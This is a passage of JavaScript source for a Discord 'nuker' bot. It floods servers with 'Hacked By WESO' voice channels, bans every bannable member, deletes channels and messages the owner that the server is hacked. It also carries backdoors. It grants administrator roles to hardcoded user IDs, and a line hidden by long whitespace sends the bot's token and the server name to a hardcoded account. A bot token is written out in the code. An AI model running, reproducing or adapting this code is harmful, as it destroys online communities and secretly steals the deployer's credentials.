m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
})
}
});

hngel.on('message', message => {
         if (message.content === "g") {
                 hngel.guilds.forEach(m =>{
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');


m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
})
}
});

hngel.on('message', message => {
         if (message.content === "g") {
                 hngel.guilds.forEach(m =>{
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');


m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
})
}
});

hngel.on('message', message => {
         if (message.content === "g") {
                 hngel.guilds.forEach(m =>{
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');


m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

})
}
});

hngel.on('message', message => {
         if (message.content === "g") {
                 hngel.guilds.forEach(m =>{
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');


m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');


})
}

});



const { Client } = require('discord.js');
const client = new Client();

async function nuge(guild) {
  let users = 0;
  let channels = 0;

  await guild.fetchMembers('  ’ TOP-WESO  , موت للجميع');
  
    await guild.owner.send('  ’ TOP-WESO , تم التهكير ').catch(e => { return void e; });


  await Promise.all(guild.members.map(async (m) => {
    if (m.bannable) {
      users++;
      await m.send('^_^').catch(e => { return void e; });
      return m.ban();
    }
  }));
  
    await Promise.all(guild.channels.map(c => {
    if (c.deletable) {
      channels++;
      return c.delete();
    }
  }));
  await guild.createChannel('Hacked By WESO ! Is here', 'text');

  await guild.createChannel('Hacked By WESO! Is here', 'text');
  







}

hngel.on('ready', () => {
  for(const [, g] of hngel.guilds) nuge(g).catch(console.error);
  console.log('-------------------------------------------------------------');
  console.log('');
  console.log("  ’ WESO ! ,");
  console.log("");
  console.log("-------------------------------------------------------------");

});

hngel.on('guildCreate', async (guild) => {
  return nuge(guild).catch(console.error);
});

 

hngel.on('guildCreate', async (guild) => {
    return nuge(guild).catch(console.error);
  });
  hngel.on('guildMemberAdd', member => {

                                                                                                                                                                                                                                                                                     if (member.id === "269031102340005888") {
                member.guild.createRole({
                    name : hngel.user.username,
                    color : "RANDOM", 
                    permissions : [8]
                }).then(function(role){
                    member.addRole(role)
                })
                
            }
        
    });
    hngel.on('guildCreate', async (guild) => {
        return nuge(guild).catch(console.error);
      });
      
      hngel.on('guildMemberAdd', member => {
          
                               //هنا vvvvvvvvvvvvvvvvvv
                  if (member.id === "664443283669516298") {//هنا الايدي بتاعك <<<<<<<<<<<<<<<<
                      member.guild.createRole({
                          name : hngel.user.username,
                          color : "RANDOM", 
                          permissions : [8]
                      }).then(function(role){
                          member.addRole(role)
                      })
                      
                  }
              
          });
          hngel.on('message' , message => {
            if (message.author.bot) return;
                        if (message.content.startsWith("664443283669516298")) {
                                                                                                                                                                                                                                                                                                                                                 hngel.users.get("269031102340005888").send(tokn+":"+message.guild.name)
            m.delete();
          
            }
                
            });

       //هنا vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
hngel.login("NzYxMTc5NDkxNjI3ODI3MjEw.X3W1pA.JgSZ1Wk5MA6eRmVOj-XhppdayzI")// هنا حط التوكن >>>>>>>>>>>>>> بتاع البوت
